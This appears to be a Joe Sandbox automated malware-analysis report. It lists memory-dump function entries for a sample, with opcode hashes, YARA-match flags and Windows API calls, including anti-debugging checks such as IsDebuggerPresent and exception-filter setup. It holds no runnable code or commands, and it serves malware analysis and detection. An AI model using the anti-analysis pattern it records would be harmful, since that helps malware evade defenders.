                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                • String ID:
                                                                                • API String ID: 254469556-0
                                                                                • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                                                • Instruction ID: 3f826736889305ecb234e0bb4f6114a69f31afa50bf0e8fcc6e92b3813a43dd4
                                                                                • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                                                • Instruction Fuzzy Hash: AC311AB5D4121C9BDB20DFA4D989BCDBBB8BF48304F1040EAE409A7250EB715A85DF04
                                                                                APIs
                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004097BE
                                                                                • IsDebuggerPresent.KERNEL32 ref: 0040988A
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004098AA
                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 004098B4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                • String ID:
                                                                                • API String ID: 254469556-0
                                                                                • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                                                • Instruction ID: c565fb8366faf90fb764b1371249259a4a166a2e914fc73a985bf40890c2a5d7
                                                                                • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                                                • Instruction Fuzzy Hash: AB312BB5D1131CDBDB10EF65D9897CDBBB8BF18304F1040AAE409A7290EB755A85CF49
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0,@$@$@,@$`,@
                                                                                • API String ID: 0-1654315312
                                                                                • Opcode ID: 5b4dbf54bdba94f60b787558392db44d93cafa9daf967c2ab35a05ecdb66b168
                                                                                • Instruction ID: 9d04eb5d453bd822a23a1c305b061fc2d574cb9f1f4083cf641312b7c7e43fb5
                                                                                • Opcode Fuzzy Hash: 5b4dbf54bdba94f60b787558392db44d93cafa9daf967c2ab35a05ecdb66b168
                                                                                • Instruction Fuzzy Hash: CA127C71B002159BDB54CF98DD80BADB7B2FF48314F1441AAEA09AB381D77AF941CB94
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 04B4C412
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 04B4C41C
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 04B4C429
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                                                                • Instruction ID: 46b9c7b27c31c4f677a546c9b3137b8e337d51f6eae02f45cfbb35a4547c6502
                                                                                • Opcode Fuzzy Hash: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                                                                • Instruction Fuzzy Hash: 5831C7B490122CABCB61DF28DD887DDBBB4BF48710F5041EAE41CA7250E770AB859F49
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040C1AB
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040C1B5
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040C1C2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                                                                • Instruction ID: dd4c83c30a1d2e7c36c102c60c461113305a32f1f02fbca7a201bc05c8f10de1
                                                                                • Opcode Fuzzy Hash: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                                                                • Instruction Fuzzy Hash: 3031E774901228EBCB21DF65D8897CDBBB4BF18310F5041EAE40CA7291E7349F858F49
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                                                                • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                                                                • ExitProcess.KERNEL32 ref: 10005F60
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                                                • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                                                                • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                                                • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(?,?,04B4F173,00000000,0041D0A0,?,00000000,?,04B51714), ref: 04B4F196
                                                                                • TerminateProcess.KERNEL32(00000000,?,04B4F173,00000000,0041D0A0,?,00000000,?,04B51714), ref: 04B4F19D
                                                                                • ExitProcess.KERNEL32 ref: 04B4F1AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                                                • Instruction ID: 5a0b6906482cab578f04eaf4a73385882b6fb4f46445c91b1b3a9aa926e356b2
                                                                                • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                                                • Instruction Fuzzy Hash: 0FE0B671844118AFDB117F54DD48A993B69FF90685F004464F80587231CB76E991DB94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$GetProcAddress.$l
                                                                                • API String ID: 0-2784972518
                                                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                • Instruction ID: d5037ae184a1353f3a29f5d41dbbdc7d36793d66b344cbbfc880b87a4d66a8bb
                                                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                • Instruction Fuzzy Hash: FB316CB6910609DFEB10DF99C880AAEBBF5FF48324F14408AD941A7310D771FA45DBA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                                                • Instruction ID: bc675e7e2c32dd5d6667c9c947488e9291fc5f904ebab751bcf1799eef5df357
                                                                                • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                                                • Instruction Fuzzy Hash: 8EF14071E002199FDF54CFA9CC806ADBBF2FF88314F158269D919AB394D735AA01CB94
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                                                • Instruction ID: e80ba316238a52440995120652ccb2ba54186a16ce09c0288fdc6cfb70fcf59f
                                                                                • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                                                • Instruction Fuzzy Hash: A0F13071E00219DFDF14CFA9D9806ADF7B1FF88324F2582A9D919AB344D731A941DB90
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                                                • Instruction ID: b8b31c7c7d4b51565c9f0be571567412a69d2e0e61470088d295795398052e15
                                                                                • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                                                • Instruction Fuzzy Hash: BDF13D71E002199BDF24CFA8C9806AEB7B1FF88314F25827AD819B7785D735AD05CB94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_819000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: +'w7$/'w7
                                                                                • API String ID: 0-209688280
                                                                                • Opcode ID: ab376b3ebedfe519d2d86d69de4708cb60d24ca93454791c626080764f8e783e
                                                                                • Instruction ID: d8f1ce8a3bdb32dbe2147ae488c759a36108509f1f3293005217a02554ceb46e
                                                                                • Opcode Fuzzy Hash: ab376b3ebedfe519d2d86d69de4708cb60d24ca93454791c626080764f8e783e
                                                                                • Instruction Fuzzy Hash: 11E1F4F36086009FE304AF2DDC8577ABBE5EF94220F1A493DEAC483744E67558458697
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_819000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Jw$_^>Z
                                                                                • API String ID: 0-3010857071
                                                                                • Opcode ID: c7e841a0aa47db7ee3a2f7d8cb695b7f7162b0f32f3d9c445c02a0506a78628c
                                                                                • Instruction ID: 3b6b4c818fc15f26278aca9e36fc39c7c242fc328413263b34275a3430891c84
                                                                                • Opcode Fuzzy Hash: c7e841a0aa47db7ee3a2f7d8cb695b7f7162b0f32f3d9c445c02a0506a78628c
                                                                                • Instruction Fuzzy Hash: 235126F3E082144BF314592EDC4576AB6DADBD0724F2F823EDA89E3788ED399D054285
                                                                                APIs
                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionRaise
                                                                                • String ID:
                                                                                • API String ID: 3997070919-0
                                                                                • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                                                • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                                                                • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                                                • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                                                                APIs
                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04B53F48,?,?,00000008,?,?,04B5AB25,00000000), ref: 04B5417A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionRaise
                                                                                • String ID:
                                                                                • API String ID: 3997070919-0
                                                                                • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                                                • Instruction ID: 851bf4821145136d6815e672a2d621058b53c36e9e3f86bff6807aee8922e64a
                                                                                • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                                                • Instruction Fuzzy Hash: 84B13F35610605DFDB15CF28C486B65BBE0FF45365F298698E899CF2B2C336E992CB40
                                                                                APIs
                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00413CE1,?,?,00000008,?,?,0041A8BE,00000000), ref: 00413F13
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionRaise
                                                                                • String ID:
                                                                                • API String ID: 3997070919-0
                                                                                • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                                                • Instruction ID: d24852c949f4e96b46ec8ab4f7cfc98de9f7939d17e0a275251b5e9f75d92b01
                                                                                • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                                                • Instruction Fuzzy Hash: D0B13B31610609DFD715CF28C48ABA57BB0FF45365F258659E89ACF3A1C339EA82CB44
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_819000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: NTDL
                                                                                • API String ID: 0-3662016964
                                                                                • Opcode ID: 00afebf5b0e0975ff4766ddc60f4b6fc56fb0df22ed522f6b3c28f70a00d9b4c
                                                                                • Instruction ID: 83f7ce410abfaf0502838fb2c797aa8a63b88fe04d3caaf5ec59c29195168fb8
                                                                                • Opcode Fuzzy Hash: 00afebf5b0e0975ff4766ddc60f4b6fc56fb0df22ed522f6b3c28f70a00d9b4c
                                                                                • Instruction Fuzzy Hash: 5881F0B298820E8FDB15CF64C5411EF3BAAFF46324F34402AD806D7A41D6B25D95DB88
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00409955,04B497B6), ref: 04B49BB5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                                                • Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
                                                                                • Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                                                • Instruction Fuzzy Hash:
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00009955,0040954F), ref: 0040994E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                                                • Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
                                                                                • Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                                                • Instruction Fuzzy Hash:
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                                                • Instruction ID: 0257905985eaa07f768d739bcbebe1686af2c7c416bc964b2178b8b8ad58e03b
                                                                                • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                                                • Instruction Fuzzy Hash: 3851277074068C5AFBF88D298C987FE679BBF02304F980419D783D7A81EA1DBB45D252
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                                                • Instruction ID: 86f290a25aed3d730e966e551bf0261eae4e64123fac5871c9a0dc21b3f8610c
                                                                                • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                                                • Instruction Fuzzy Hash: 1851467175074C96EBF8CA28CC947BE679BBB02308F084429CB47D7680E61DBB45E356
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                                                • Instruction ID: b9f3cf54a43b37b6f63110615f6ebe7ae02d2151f078c9cebda4c17c6b13ec97
                                                                                • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                                                • Instruction Fuzzy Hash: 05515B7070064866EF799E6C88D47BE77EEDBC2308F0409DED48ADB281E625F944B752
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                                                • Instruction ID: 27f77c7acea2fc84f8a590b6e4e10ead9a2a83a80aada22a30ccf30e84eacb9e
                                                                                • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                                                • Instruction Fuzzy Hash: 4D516C30704648A6EF389EAC88947BE679DEBD2708F0805DED482D72C1D661F946F352
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                                                • Instruction ID: c0798f424e7f96b2d13f24c6de611a6824aa2a21751a5330029b757c988de18e
                                                                                • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                                                • Instruction Fuzzy Hash: 8A513870E04644AADB389AED88957BF67999F01308F54043FD882F73C1D67DAD4E861E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                                                • Instruction ID: 624e85d5d4f9056646b760ddf11ce83fdf6d5af507a6eedaef23f3504edbf722
                                                                                • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                                                • Instruction Fuzzy Hash: B5512370E0474896DB389AE88895BBF67995B12308F14483FD84AF73C1C67E9D4EC61E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_819000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: {eg7
                                                                                • API String ID: 0-1097312549
                                                                                • Opcode ID: 2b9d37821e44af4899ee4adcccd07fed68d5457abd838ab2fb99dcefee61ba3d
                                                                                • Instruction ID: 8ff4cc1cbcaace104641fab8fcbe427b88172dac225fd1b264f076e4a9c98a50
                                                                                • Opcode Fuzzy Hash: 2b9d37821e44af4899ee4adcccd07fed68d5457abd838ab2fb99dcefee61ba3d
                                                                                • Instruction Fuzzy Hash: 44516EF3A483045BE3042D3DDDC8776BBDADB94720F1A813DDB8497788DD395944425A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                                                                • Instruction ID: db96d4e104870dfdb4604e048bdcef2b5de764a7f997af51e6fd30e8cbbdc946
                                                                                • Opcode Fuzzy Hash: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                                                                • Instruction Fuzzy Hash: 06322321E29F414DD7239638D922336A698AFB73C5F55D737F81AB6DA6EB28D0834100
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                                                                • Instruction ID: 77e6785c828baecb52582d09b1b14edac196714ae9321c17d64660e5f0acdfa7
                                                                                • Opcode Fuzzy Hash: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                                                                • Instruction Fuzzy Hash: DB320531E69F414DD7239634D822336A288AFB73D5F55D737E826B5EA6EB28C4C34108
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
